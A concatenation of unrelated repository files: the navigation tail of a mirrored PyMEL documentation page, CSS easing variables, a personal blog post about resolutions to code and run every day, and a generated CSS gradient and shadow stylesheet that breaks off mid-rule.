class="xref">windows</tt></a></li> </ul> <h3><a href="../../../modules.html">Type Modules</a></h3> <ul> <li><a class="reference external" href="../../pymel.core.datatypes.html#module-pymel.core.datatypes"><tt class="xref">datatypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.nodetypes.html#module-pymel.core.nodetypes"><tt class="xref">nodetypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.uitypes.html#module-pymel.core.uitypes"><tt class="xref">uitypes</tt></a></li> </ul> <h3><a href="../../../modules.html">Other Modules</a></h3> <ul> <li><a class="reference external" href="../../pymel.api.plugins.html#module-pymel.api.plugins"><tt class="xref">plugins</tt></a></li> <li><a class="reference external" href="../../pymel.mayautils.html#module-pymel.mayautils"><tt class="xref">mayautils</tt></a></li> <li><a class="reference external" href="../../pymel.util.html#module-pymel.util"><tt class="xref">util</tt></a></li> <li><a class="reference external" href="../../pymel.versions.html#module-pymel.versions"><tt class="xref">versions</tt></a> </li><li><a class="reference external" href="../../pymel.tools.html#module-pymel.tools"><tt class="xref">tools</tt></a></li> </ul> <!-- <ul> <li><a class="reference external" href="../../pymel.core.animation.html.html#module-pymel.core.animation"><tt class="xref">animation</tt></a></li> <li><a class="reference external" href="../../pymel.core.datatypes.html.html#module-pymel.core.datatypes"><tt class="xref">datatypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.effects.html.html#module-pymel.core.effects"><tt class="xref">effects</tt></a></li> <li><a class="reference external" href="../../pymel.core.general.html.html#module-pymel.core.general"><tt class="xref">general</tt></a></li> <li><a class="reference external" href="../../pymel.core.language.html.html#module-pymel.core.language"><tt class="xref">language</tt></a></li> <li><a class="reference external" href="../../pymel.core.modeling.html.html#module-pymel.core.modeling"><tt class="xref">modeling</tt></a></li> <li><a class="reference external" href="../../pymel.core.nodetypes.html.html#module-pymel.core.nodetypes"><tt class="xref">nodetypes</tt></a></li> <li><a class="reference external" href="../../pymel.core.rendering.html.html#module-pymel.core.rendering"><tt class="xref">rendering</tt></a></li> <li><a class="reference external" href="../../pymel.core.system.html.html#module-pymel.core.system"><tt class="xref">system</tt></a></li> <li><a class="reference external" href="../../pymel.core.windows.html.html#module-pymel.core.windows"><tt class="xref">windows</tt></a></li> <li><a class="reference external" href="../../pymel.util.html.html#module-pymel.util"><tt class="xref">pymel.util</tt></a></li> </ul> --> <h3>This Page</h3> <ul class="this-page-menu"> <li><a href="../../../_sources/generated/functions/pymel.core.modeling/pymel.core.modeling.nurbsToPoly.txt" rel="nofollow">Show Source</a></li> </ul> <div id="searchbox" style="display: none"> <h3>Quick search</h3> <form action="http://help.autodesk.com/cloudhelp/2016/ENU/Maya-Tech-Docs/PyMel/search.html" class="search" method="get"></form> <input name="q" type="text"/> <input type="submit" value="Go"/> <input name="check_keywords" type="hidden" value="yes"/> <input name="area" type="hidden" value="default"/> <p class="searchtip" style="font-size: 90%"> Enter search terms or a module, class or function name. </p> </div> <script type="text/javascript">$('#searchbox').show(0);</script> </div> </div> <div class="clearer"></div> </div> <div class="related"> <h3>Navigation</h3> <ul> <li class="right" style="margin-right: 10px"> <a href="../../../genindex.html" title="General Index">index</a></li> <li class="right"> <a href="../../../py-modindex.html" title="Python Module Index">modules</a> |</li> <li class="right"> <a href="pymel.core.modeling.nurbsToPolygonsPref.html" title="pymel.core.modeling.nurbsToPolygonsPref">next</a> |</li> <li class="right"> <a href="pymel.core.modeling.nurbsSquare.html" title="pymel.core.modeling.nurbsSquare">previous</a> |</li> <li><a href="../../../index-2.html">PyMEL 1.0.7 documentation</a> »</li> <li><a href="../../pymel.core.modeling.html">pymel.core.modeling</a> »</li> </ul> </div> <div class="footer"> © Copyright 2009, Chad Dombrova. Created using <a href="http://sphinx-doc.org/">Sphinx</a> 1.2.3. </div> <!-- Mirrored from help.autodesk.com/cloudhelp/2016/ENU/Maya-Tech-Docs/PyMel/generated/functions/pymel.core.modeling/pymel.core.modeling.nurbsToPoly.html by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 01 Aug 2015 05:35:23 GMT --> </body></html>
tests/dummy/app/styles/variables/_animation-easing.css
Ticketfly/ember-ticketfly-accordion
:root { --easing__ease-in-quad: cubic-bezier(0.550, 0.085, 0.680, 0.530); --easing__ease-in-sine: cubic-bezier(0.550, 0.085, 0.680, 0.530); --easing__ease-out-sine: cubic-bezier(0.390, 0.575, 0.565, 1.000); --easing__ease-out-quad: cubic-bezier(0.250, 0.460, 0.450, 0.940); --easing__ease-out-cubic: cubic-bezier(0.215, 0.610, 0.355, 1.000); --easing__ease-out-cubic--bounce-25: cubic-bezier(0.27, 0.78, 0.75, 2.15); --easing__ease-in-out: cubic-bezier(.42, 0, .58, 1); --easing__accelerating-exit: cubic-bezier(0.34, 0, 0, 1); --easing__decelerating-entrance: var(--easing__ease-out-cubic); --easing__point-to-point: var(--easing__ease-in-out); }
programming/flatiron-school/2015/01/01/new-years-resolutions.html
JessRudder/JessRudder.github.io
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>New Year&#39;s Resolutions</title> <meta name="description" content="In general, I'm not big on New Year's resolutions. I feel similar to the Stoics on this front - if there's something that you truly want to change, change i..."> <link rel="stylesheet" href="/css/app.css"> <link href="http://fonts.googleapis.com/css?family=Josefin+Sans:400,700,600,300" media="screen" rel="stylesheet" type="text/css" /> <link rel="stylesheet" href="/css/superslides.css"/> <link rel="stylesheet" href="/css/slick-theme.css"/> <link rel="stylesheet" href="/css/slick.css"/> <link rel="stylesheet" href="/css/animate.css"/> <link rel="stylesheet" href="/css/linea-styles.css"/> <link rel="stylesheet" href="/css/linea-arrows-styles.css"/> <link rel="stylesheet" href="/css/font-awesome.css"/> <link rel="stylesheet" href="/css/chivo.css"/> <link rel="stylesheet" href="/css/style.css"/> <link rel="stylesheet" href="/css/responsive.css"/> <script src="/bower_components/modernizr/modernizr.js"></script> <link rel="canonical" href="/programming/flatiron-school/2015/01/01/new-years-resolutions.html"> <link rel="alternate" type="application/rss+xml" title="Jessica Rudder | software engineer, speaker, youtuber" href="/feed.xml"> </head> <body> <div class='contain-to-grid sticky transparent'> <nav class='top-bar' data-options='sticky_on: large' data-topbar=''> <ul class='title-area'> <li class=""> <h1> <a href='/index.html'> <span>L.</span>avar </a> </h1> </li> </ul> <div id="menu-toggler" class="right"> <a href='#'> <i class="icon-arrows-hamburger-2"></i> </a> </div> <section class='top-bar-section closed'> <ul class='right'> <li class="has-dropdown "> <a href="/about.html">Who I Am</a> <ul class='dropdown'> <li> <a href="/about.html">About Us</a> </li> <li> <a href="/services.html">Services</a> </li> <li> <a href="/services-2.html">Services 2</a> </li> </ul> </li> <li class="has-dropdown "> <a href="/portfolio.html">What I Do</a> <ul class='dropdown'> <li> <a href="/portfolio.html">Code</a> </li> <li> <a href="/portfolio-2.html">Talks</a> </li> <li> <a href="/portfolio-item.html">Videos</a> </li> <li> <a href="/portfolio-item-2.html">Single Page 2</a> </li> </ul> </li> <li class=""> <a href="/blog/">Where I Write</a> </li> <li class=""> <a href="/contact.html">Get In Touch</a> </li> </ul> </section> </nav> </div> <div class="full"> <div class="post single"> <div class="post-header" style="background-image: url(/images/@stock/post-6.jpg)"> </div> <div class="four spacing"></div> <div class="row"> <div class="large-9 large-centered columns"> <div class="post-content"> <h2>New Year's Resolutions</h2> <p class='info'> <span> <a href="#">Programming</a> , <a href="#">Flatiron-school</a> </span> / <span>January 01, 2015</span> / <span><a href="#">2 Comments</a></span> </p> <p>In general, I’m not big on New Year’s resolutions. I feel similar to the Stoics on this front - if there’s something that you truly want to change, change it. You don’t need an arbitrary time marker to make it happen. That said, there’s nothing more abitrary than a new year and I do like setting goals.</p> <p>Last year I had two goals:</p> <ol> <li>Find a job I enjoy</li> <li>Run every day for a year</li> </ol> <p>When I set the first goal, I imagined I’d be looking for a better situation in the same field - search engine marketing. I had been learning to code on the side for a couple years, but the goal of becoming a programmer seemed much further away. Through an odd sequence of events, I ended up taking the Web Development immersive at Flatiron School half-way through the year. Then I accepted a hybrid marketing/programming role at the school with the official title of Marketing Engineer (primarily so certain people could refer to me as a Marketeer).</p> <p>Goal #1 was accomplished!</p> <p>Sadly, Goal #1 killed Goal #2 as I threw myself into my new job. I had run a minimum of 1 mile (usually more) every day for the first 9.5 months of the year. I still ran most days, but, I missed 9 days in the final 2.5 months. Running 97.5% of the days in the year isn’t terrible.</p> <p>That brings us to 2015.</p> <p>More importantly, that brings us to this photo:</p> <p><img class="img-center" src="/images/posts/2014-commits.png" width="737px" height="292px" alt="'jessrudder 2014 Commits'" title="My 2014 commits!" /></p> <p>It’s my commit history on Github for 2014. Not bad, but I can do better. In fact, as a new developer, I need to do better. There are far too many stretches where no code is being written. So, I’m copying John Resig with his <a href="http://ejohn.org/blog/write-code-every-day/">Write Code Every Day</a> goal. I’d like to see a wall of green on my commit history at the end of 2015.</p> <p>And, because I miss running (and I like to commit to doing things daily), I’m bringing back my 2014 goal of running every day for a year. In 2013 I only made it 6 months. In 2014 I made it 9.5. 2015 feels like my year!</p> </div> </div> </div> </div> </div> <div class="full light-grey"> <div class="row"> <div class="large-9 large-centered columns"> <h2> Comments </h2> </div> </div> <div class="row"> <div class="large-9 large-centered columns"> <div class='comments-wrapper'> <ul class='comments'> <li> <div class='meta'> <p class='avatar'> <img width="39" height="39" alt="" src="/images/avatar.png" /> </p> <p class='info'> <span class='name'>Amy</span> <span class='datetime'>October 15, 2011 at 3:30 pm</span> <a href='#comment-form'>Reply</a> </p> </div> <p> Dolor consectetur et dolorem distinctio beatae doloribus magni ducimus reprehenderit voluptatibus ex officia quia. cum facere est quas provident ea nam quibusdam deserunt quis. error quis nihil ad quia corrupti asperiores labore quis error ut debitis nobis iste. laborum sint qui aut asperiores numquam itaque ea illum </p> </li> <li> <div class='meta'> <p class='avatar'> <img width="39" height="39" alt="" src="/images/avatar.png" /> </p> <p class='info'> <span class='name'>Amy</span> <span class='datetime'>October 15, 2011 at 3:30 pm</span> <a href='#comment-form'>Reply</a> </p> </div> <p>Quam cumque magni voluptas. possimus neque in voluptates.</p> <ul class='children'> <li> <div class='meta'> <p class='avatar'> <img width="39" height="39" alt="" src="/images/avatar.png" /> </p> <p class='info'> <span class='name'>Amy</span> <span class='datetime'>October 15, 2011 at 3:30 pm</span> <a href='#comment-form'>Reply</a> </p> </div> <p>Quas ut vel nobis veniam explicabo consequatur. iusto nisi eius iure voluptas perferendis omnis quod excepturi et eum. sed porro tenetur ut unde suscipit optio ipsum molestiae</p> </li> </ul> </li> <li> <div class='meta'> <p class='avatar'> <img width="39" height="39" alt="" src="/images/avatar.png" /> </p> <p class='info'> <span class='name'>Amy</span> <span class='datetime'>October 15, 2011 at 3:30 pm</span> <a href='#comment-form'>Reply</a> </p> </div> <p>Saepe laudantium ipsum labore dolorum officia et odio debitis et. consequatur non veniam deserunt rerum nihil sint est</p> </li> </ul> </div> </div> </div> </div> <div class="full"> <div class="row"> <div class="large-9 large-centered columns"> <h2> Your comments </h2> </div> </div> <div class="row"> <div class="large-9 large-centered columns"> <div class='two spacing'></div> <div id='comments-form'> <form class="dark" accept-charset='UTF-8' action='#' method='post'> <p class='name'> <input class='input-text required' id='name' name='name' type='text' placeholder='Name'> </p> <p class='email'> <input class='input-text required' id='email' name='email' type='text' placeholder='Email'> </p> <p class='message'> <textarea class='required' id='message' name='message' placeholder='Message'></textarea> </p> <div class='spacing'></div> <p> <input class='button boxed small' type='submit' value='Send Message'> </p> </form> </div> </div> </div> </div> <div class="full light-grey"> <nav class='wrapper'> <div class="row"> <div class="small-6 columns"> <a class="previous button boxed black" href='/ajax/xml/json/2014/08/28/ajax-get-to-know-your-asynchronous-friend.html'> <i class='fa fa-angle-left'></i> Previous post </a> </div> <div class="small-6 columns"> <a class="next button boxed black" href='/travel/2016/04/05/new-way-new-move.html'> Next post<i class='fa fa-angle-right'></i> </a> </div> </div> </nav> </div> <div class="full no-padding footer brown centered-text"> <div class="four spacing"></div> <div class="row"> <div class="small-12 columns"> <ul class="socials"> <li><a href="https://twitter.com/jessrudder"><i class='fa fa-twitter'></i></a></li> <li><a href="https://www.linkedin.com/in/jessrudder/"><i class='fa fa-linkedin'></i></a></li> <li><a href="https://github.com/jessrudder"><i class='fa fa-github'></i></a></li> <li><a href="https://youtube.com/compchomp"><i class='fa fa-youtube'></i></a></li> </ul> <p>Copyright ©2018 Jessica Rudder | software engineer, speaker, youtuber.</p> <p>All rights reserved.</p> <div class="four spacing"></div> <p class="back-to-top"><a href="#"><i class="fa fa-chevron-up"></i>Back to top</a></p> </div> </div> <div class="spacing"></div> </div> <script src="/bower_components/jquery/dist/jquery.min.js"></script> <script src="/bower_components/foundation/js/foundation.min.js"></script> <script src="/js/jquery.superslides.min.js"></script> <script src="/js/slick.min.js"></script> <script src="/js/wow.min.js"></script> <script src="/js/jquery.validate.js"></script> <script src="/bower_components/countto/jquery.countTo.js"></script> <script src="/bower_components/appear/jquery.appear.js"></script> <script src="/js/app.js"></script> </body> </html>
widgets/common/assets/gradients/glassy/glassySienna/glassySienna7.css
idutta2007/yiigems
.background_glassySienna7, .hover_background_glassySienna7:hover, .active_background_glassySienna7:active:hover { background: #7c3f23; background-image: -moz-linear-gradient(top, rgb(111, 57, 31) 0%, rgb(99, 51, 28) 50%, rgb(87, 44, 24) 55%, rgb(124, 63, 35) 100%); background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, rgb(111, 57, 31)), color-stop(50%, rgb(99, 51, 28)), color-stop(55%, rgb(87, 44, 24)), color-stop(100%, rgb(124, 63, 35))); background-image: -webkit-linear-gradient(top, rgb(111, 57, 31) 0%, rgb(99, 51, 28) 50%, rgb(87, 44, 24) 55%, rgb(124, 63, 35) 100%); background-image: -o-linear-gradient(top, rgb(111, 57, 31) 0%, rgb(99, 51, 28) 50%, rgb(87, 44, 24) 55%, rgb(124, 63, 35) 100%); background-image: -ms-linear-gradient(top, rgb(111, 57, 31) 0%, rgb(99, 51, 28) 50%, rgb(87, 44, 24) 55%, rgb(124, 63, 35) 100%); background-image: linear-gradient(to bottom, rgb(111, 57, 31) 0%, rgb(99, 51, 28) 50%, rgb(87, 44, 24) 55%, rgb(124, 63, 35) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6f391f', endColorstr='#7c3f23',GradientType=0 ); } .background_glassySienna7h, .hover_background_glassySienna7h:hover, .active_background_glassySienna7h:active:hover { background: #7c3f23; background-image: -moz-linear-gradient(top, rgb(134, 68, 38) 0%, rgb(119, 61, 33) 50%, rgb(104, 53, 29) 55%, rgb(148, 76, 42) 100%); background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, rgb(134, 68, 38)), color-stop(50%, rgb(119, 61, 33)), color-stop(55%, rgb(104, 53, 29)), color-stop(100%, rgb(148, 76, 42))); background-image: -webkit-linear-gradient(top, rgb(134, 68, 38) 0%, rgb(119, 61, 33) 50%, rgb(104, 53, 29) 55%, rgb(148, 76, 42) 100%); background-image: -o-linear-gradient(top, rgb(134, 68, 38) 0%, rgb(119, 61, 33) 50%, rgb(104, 53, 29) 55%, rgb(148, 76, 42) 100%); background-image: -ms-linear-gradient(top, rgb(134, 68, 38) 0%, rgb(119, 61, 33) 50%, rgb(104, 53, 29) 55%, rgb(148, 76, 42) 100%); background-image: linear-gradient(to bottom, rgb(134, 68, 38) 0%, rgb(119, 61, 33) 50%, rgb(104, 53, 29) 55%, rgb(148, 76, 42) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#864426', endColorstr='#944c2a',GradientType=0 ); } .background_glassySienna7a, .hover_background_glassySienna7a:hover, .active_background_glassySienna7a:active:hover { background: #7c3f23; background-image: -moz-linear-gradient(top, rgb(148, 76, 42) 0%, rgb(104, 53, 29) 50%, rgb(119, 61, 33) 55%, rgb(134, 68, 38) 100%); background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, rgb(148, 76, 42)), color-stop(50%, rgb(104, 53, 29)), color-stop(55%, rgb(119, 61, 33)), color-stop(100%, rgb(134, 68, 38))); background-image: -webkit-linear-gradient(top, rgb(148, 76, 42) 0%, rgb(104, 53, 29) 50%, rgb(119, 61, 33) 55%, rgb(134, 68, 38) 100%); background-image: -o-linear-gradient(top, rgb(148, 76, 42) 0%, rgb(104, 53, 29) 50%, rgb(119, 61, 33) 55%, rgb(134, 68, 38) 100%); background-image: -ms-linear-gradient(top, rgb(148, 76, 42) 0%, rgb(104, 53, 29) 50%, rgb(119, 61, 33) 55%, rgb(134, 68, 38) 100%); background-image: linear-gradient(to bottom, rgb(148, 76, 42) 0%, rgb(104, 53, 29) 50%, rgb(119, 61, 33) 55%, rgb(134, 68, 38) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#944c2a', endColorstr='#864426',GradientType=0 ); } .background_glassySienna7s, .hover_background_glassySienna7s:hover, .active_background_glassySienna7s:active:hover { background: #7c3f23; background-image: -moz-linear-gradient(top, rgb(167, 86, 47) 0%, rgb(148, 76, 42) 50%, rgb(130, 67, 37) 55%, rgb(186, 95, 52) 100%); background-image: -webkit-gradient(linear, left top, left bottom, color-stop(0%, rgb(167, 86, 47)), color-stop(50%, rgb(148, 76, 42)), color-stop(55%, rgb(130, 67, 37)), color-stop(100%, rgb(186, 95, 52))); background-image: -webkit-linear-gradient(top, rgb(167, 86, 47) 0%, rgb(148, 76, 42) 50%, rgb(130, 67, 37) 55%, rgb(186, 95, 52) 100%); background-image: -o-linear-gradient(top, rgb(167, 86, 47) 0%, rgb(148, 76, 42) 50%, rgb(130, 67, 37) 55%, rgb(186, 95, 52) 100%); background-image: -ms-linear-gradient(top, rgb(167, 86, 47) 0%, rgb(148, 76, 42) 50%, rgb(130, 67, 37) 55%, rgb(186, 95, 52) 100%); background-image: linear-gradient(to bottom, rgb(167, 86, 47) 0%, rgb(148, 76, 42) 50%, rgb(130, 67, 37) 55%, rgb(186, 95, 52) 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#a7562f', endColorstr='#ba5f34',GradientType=0 ); } .background_color_glassySienna7, .hover_background_color_glassySienna7:hover, .active_background_color_glassySienna7:active:hover { background-color:#7c3f23; } .background_first_color_glassySienna7, .hover_background_first_color_glassySienna7:hover, .active_background_first_color_glassySienna7:active:hover { background-color:#6f391f; } .background_last_color_glassySienna7, .hover_background_last_color_glassySienna7:hover, .active_background_color_last_glassySienna7:active:hover { background-color:#7c3f23; } /* ------------------------------ color settings -------------------------------*/ .color_glassySienna7, .hover_color_glassySienna7:hover, .active_color_glassySienna7:active:hover { color: #c8c8c8; } .color_glassySienna7h, .hover_color_glassySienna7h:hover, .active_color_glassySienna7h:active:hover { color: #c8c8c8; } .color_glassySienna7a, .hover_color_glassySienna7a:hover, .active_color_glassySienna7a:active:hover { color: #ff0; } .color_glassySienna7s, .hover_color_glassySienna7s:hover, .active_color_glassySienna7s:active:hover { color: #dd0; } /* -------------------------- border color settings -----------------------------*/ .border_glassySienna7, .hover_border_glassySienna7:hover, .active_border_glassySienna7:active:hover { border-color: #592e19 #4a2615 #4a2615 #592e19; } .border_glassySienna7h, .hover_border_glassySienna7h:hover, .active_border_glassySienna7h:active:hover { border-color: #592e19 #4a2615 #4a2615 #592e19; } .border_glassySienna7a, .hover_border_glassySienna7a:hover, .active_border_glassySienna7a:active:hover { border-color: #452413 #452413 #452413 #452413; } .border_glassySienna7s, .hover_border_glassySienna7s:hover, .active_border_glassySienna7s:active:hover { border-color: #452413 #452413 #452413 #452413; } /* -------------------------- shadow expand settings --------------------------------*/ .shadow_expand_glassySienna7, .hover_shadow_expand_glassySienna7:hover, .active_shadow_expand_glassySienna7:active:hover { -webkit-box-shadow: 0em 0em 1em 0.25em rgba(124, 63, 35, .39); -moz-box-shadow: 0em 0em 1em 0.25em rgba(124, 63, 35, .39); box-shadow: 0em 0em 1em 0.25em rgba(124, 63, 35, .39); } .shadow_expand_glassySienna7h, .hover_shadow_expand_glassySienna7h:hover, .active_shadow_expand_glassySienna7h:active:hover { -webkit-box-shadow: 0em 0em 1em 0.25em rgba(148, 76, 42, .50); -moz-box-shadow: 0em 0em 1em 0.25em rgba(148, 76, 42, .50); box-shadow: 0em 0em 1em 0.25em rgba(148, 76, 42, .50); } .shadow_expand_glassySienna7a, .hover_shadow_expand_glassySienna7a:hover, .active_shadow_expand_glassySienna7a:active:hover { -webkit-box-shadow: 0em 0em 1em 0.25em rgba(134, 68, 38, .63); -moz-box-shadow: 0em 0em 1em 0.25em rgba(134, 68, 38, .63); box-shadow: 0em 0em 1em 0.25em rgba(134, 68, 38, .63); } .shadow_expand_glassySienna7s, .hover_shadow_expand_glassySienna7s:hover, .active_shadow_expand_glassySienna7s:active:hover { -webkit-box-shadow: 0em 0em 1em 0.25em rgba(134, 68, 38, .78); -moz-box-shadow: 0em 0em 1em 0.25em rgba(134, 68, 38, .78); box-shadow: 0em 0em 1em 0.25em rgba(134, 68, 38, .78); } /* -------------------------- shadow left settings --------------------------------*/ .shadow_left_glassySienna7, .hover_shadow_left_glassySienna7:hover, .active_shadow_left_glassySienna7:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(124, 63, 35, .39); -moz-box-shadow: -0.5em -0.5em 1em rgba(124, 63, 35, .39); box-shadow: -0.5em -0.5em 1em rgba(124, 63, 35, .39); } .shadow_left_glassySienna7h, .hover_shadow_left_glassySienna7h:hover, .active_shadow_left_glassySienna7h:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(148, 76, 42, .50); -moz-box-shadow: -0.5em -0.5em 1em rgba(148, 76, 42, .50); box-shadow: -0.5em -0.5em 1em rgba(148, 76, 42, .50); } .shadow_left_glassySienna7a, .hover_shadow_left_glassySienna7a:hover, .active_shadow_left_glassySienna7a:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .63); -moz-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .63); box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .63); } .shadow_left_glassySienna7s, .hover_shadow_left_glassySienna7s:hover, .active_shadow_left_glassySienna7s:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .78); -moz-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .78); box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .78); } /* -------------------------- shadow right settings --------------------------------*/ .shadow_right_glassySienna7, .hover_shadow_right_glassySienna7:hover, .active_shadow_right_glassySienna7:active:hover { -webkit-box-shadow: 0.5em 0em 1em rgba(124, 63, 35, .39); -moz-box-shadow: 0.5em 0em 1em rgba(124, 63, 35, .39); box-shadow: 0.5em 0em 1em rgba(124, 63, 35, .39); } .shadow_right_glassySienna7h, .hover_shadow_right_glassySienna7h:hover, .active_shadow_right_glassySienna7h:active:hover { -webkit-box-shadow: 0.5em 0em 1em rgba(148, 76, 42, .50); -moz-box-shadow: 0.5em 0em 1em rgba(148, 76, 42, .50); box-shadow: 0.5em 0em 1em rgba(148, 76, 42, .50); } .shadow_right_glassySienna7a, .hover_shadow_right_glassySienna7a:hover, .active_shadow_right_glassySienna7a:active:hover { -webkit-box-shadow: 0.5em 0em 1em rgba(134, 68, 38, .63); -moz-box-shadow: 0.5em 0em 1em rgba(134, 68, 38, .63); box-shadow: 0.5em 0em 1em rgba(134, 68, 38, .63); } .shadow_right_glassySienna7s, .hover_shadow_right_glassySienna7s:hover, .active_shadow_right_glassySienna7s:active:hover { -webkit-box-shadow: 0.5em 0em 1em rgba(134, 68, 38, .78); -moz-box-shadow: 0.5em 0em 1em rgba(134, 68, 38, .78); box-shadow: 0.5em 0em 1em rgba(134, 68, 38, .78); } /* -------------------------- shadow top settings --------------------------------*/ .shadow_top_glassySienna7, .hover_shadow_top_glassySienna7:hover, .active_shadow_top_glassySienna7:active:hover { -webkit-box-shadow: 0em -0.5em 1em rgba(124, 63, 35, .39); -moz-box-shadow: 0em -0.5em 1em rgba(124, 63, 35, .39); box-shadow: 0em -0.5em 1em rgba(124, 63, 35, .39); } .shadow_top_glassySienna7h, .hover_shadow_top_glassySienna7h:hover, .active_shadow_top_glassySienna7h:active:hover { -webkit-box-shadow: 0em -0.5em 1em rgba(148, 76, 42, .50); -moz-box-shadow: 0em -0.5em 1em rgba(148, 76, 42, .50); box-shadow: 0em -0.5em 1em rgba(148, 76, 42, .50); } .shadow_top_glassySienna7a, .hover_shadow_top_glassySienna7a:hover, .active_shadow_top_glassySienna7a:active:hover { -webkit-box-shadow: 0em -0.5em 1em rgba(134, 68, 38, .63); -moz-box-shadow: 0em -0.5em 1em rgba(134, 68, 38, .63); box-shadow: 0em -0.5em 1em rgba(134, 68, 38, .63); } .shadow_top_glassySienna7s, .hover_shadow_top_glassySienna7s:hover, .active_shadow_top_glassySienna7s:active:hover { -webkit-box-shadow: 0em -0.5em 1em rgba(134, 68, 38, .78); -moz-box-shadow: 0em -0.5em 1em rgba(134, 68, 38, .78); box-shadow: 0em -0.5em 1em rgba(134, 68, 38, .78); } /* -------------------------- shadow bottom settings --------------------------------*/ .shadow_bottom_glassySienna7, .hover_shadow_bottom_glassySienna7:hover, .active_shadow_bottom_glassySienna7:active:hover { -webkit-box-shadow: 0em 0.5em 1em rgba(124, 63, 35, .39); -moz-box-shadow: 0em 0.5em 1em rgba(124, 63, 35, .39); box-shadow: 0em 0.5em 1em rgba(124, 63, 35, .39); } .shadow_bottom_glassySienna7h, .hover_shadow_bottom_glassySienna7h:hover, .active_shadow_bottom_glassySienna7h:active:hover { -webkit-box-shadow: 0em 0.5em 1em rgba(148, 76, 42, .50); -moz-box-shadow: 0em 0.5em 1em rgba(148, 76, 42, .50); box-shadow: 0em 0.5em 1em rgba(148, 76, 42, .50); } .shadow_bottom_glassySienna7a, .hover_shadow_bottom_glassySienna7a:hover, .active_shadow_bottom_glassySienna7a:active:hover { -webkit-box-shadow: 0em 0.5em 1em rgba(134, 68, 38, .63); -moz-box-shadow: 0em 0.5em 1em rgba(134, 68, 38, .63); box-shadow: 0em 0.5em 1em rgba(134, 68, 38, .63); } .shadow_bottom_glassySienna7s, .hover_shadow_bottom_glassySienna7s:hover, .active_shadow_bottom_glassySienna7s:active:hover { -webkit-box-shadow: 0em 0.5em 1em rgba(134, 68, 38, .78); -moz-box-shadow: 0em 0.5em 1em rgba(134, 68, 38, .78); box-shadow: 0em 0.5em 1em rgba(134, 68, 38, .78); } /* -------------------------- shadow top_left settings --------------------------------*/ .shadow_top_left_glassySienna7, .hover_shadow_top_left_glassySienna7:hover, .active_shadow_top_left_glassySienna7:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(124, 63, 35, .39); -moz-box-shadow: -0.5em -0.5em 1em rgba(124, 63, 35, .39); box-shadow: -0.5em -0.5em 1em rgba(124, 63, 35, .39); } .shadow_top_left_glassySienna7h, .hover_shadow_top_left_glassySienna7h:hover, .active_shadow_top_left_glassySienna7h:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(148, 76, 42, .50); -moz-box-shadow: -0.5em -0.5em 1em rgba(148, 76, 42, .50); box-shadow: -0.5em -0.5em 1em rgba(148, 76, 42, .50); } .shadow_top_left_glassySienna7a, .hover_shadow_top_left_glassySienna7a:hover, .active_shadow_top_left_glassySienna7a:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .63); -moz-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .63); box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .63); } .shadow_top_left_glassySienna7s, .hover_shadow_top_left_glassySienna7s:hover, .active_shadow_top_left_glassySienna7s:active:hover { -webkit-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .78); -moz-box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .78); box-shadow: -0.5em -0.5em 1em rgba(134, 68, 38, .78); } /* -------------------------- shadow top_right settings --------------------------------*/ .shadow_top_right_glassySienna7, .hover_shadow_top_right_glassySienna7:hover, .active_shadow_top_right_glassySienna7:active:hover { -webkit-box-shadow: 0.5em -0.5em 1em rgba(124, 63, 35, .39); -moz-box-shadow: 0.5em -0.5em 1em rgba(124, 63, 35, .39); box-shadow: 0.5em -0.5em 1em rgba(124, 63, 35, .39); } .shadow_top_right_glassySienna7h, .hover_shadow_top_right_glassySienna7h:hover, .active_shadow_top_right_glassySienna7h:active:hover { -webkit-box-shadow: 0.5em -0.5em 1em rgba(148, 76, 42, .50); -moz-box-shadow: 0.5em -0.5em 1em rgba(148, 76, 42, .50); box-shadow: 0.5em -0.5em 1em rgba(148, 76, 42, .50); } .shadow_top_right_glassySienna7a, .hover_shadow_top_right_glassySienna7a:hover, .active_shadow_top_right_glassySienna7a:active:hover { -webkit-box-shadow: 0.5em -0.5em 1em rgba(134, 68, 38, .63); -moz-box-shadow: 0.5em -0.5em 1em rgba(134, 68, 38, .63); box-shadow: 0.5em -0.5em 1em rgba(134, 68, 38, .63); } .shadow_top_right_glassySienna7s, .hover_shadow_top_right_glassySienna7s:hover, .active_shadow_top_right_glassySienna7s:active:hover { -webkit-box-shadow: 0.5em -0.5em 1em rgba(134, 68, 38, .78); -moz-box-shadow: 0.5em -0.5em 1em rgba(134, 68, 38, .78); box-shadow: 0.5em -0.5em 1em rgba(134, 68, 38, .78); } /* -------------------------- shadow bottom_left settings --------------------------------*/ .shadow_bottom_left_glassySienna7, .hover_shadow_bottom_left_glassySienna7:hover, .active_shadow_bottom_left_glassySienna7:active:hover { -webkit-box-shadow: -0.5em 0.5em 1em rgba(124, 63, 35, .39); -moz-box-shadow: -0.5em 0.5em 1em rgba(124, 63, 35, .39); box-shadow: -0.5em 0.5em 1em rgba(124, 63, 35, .39); } 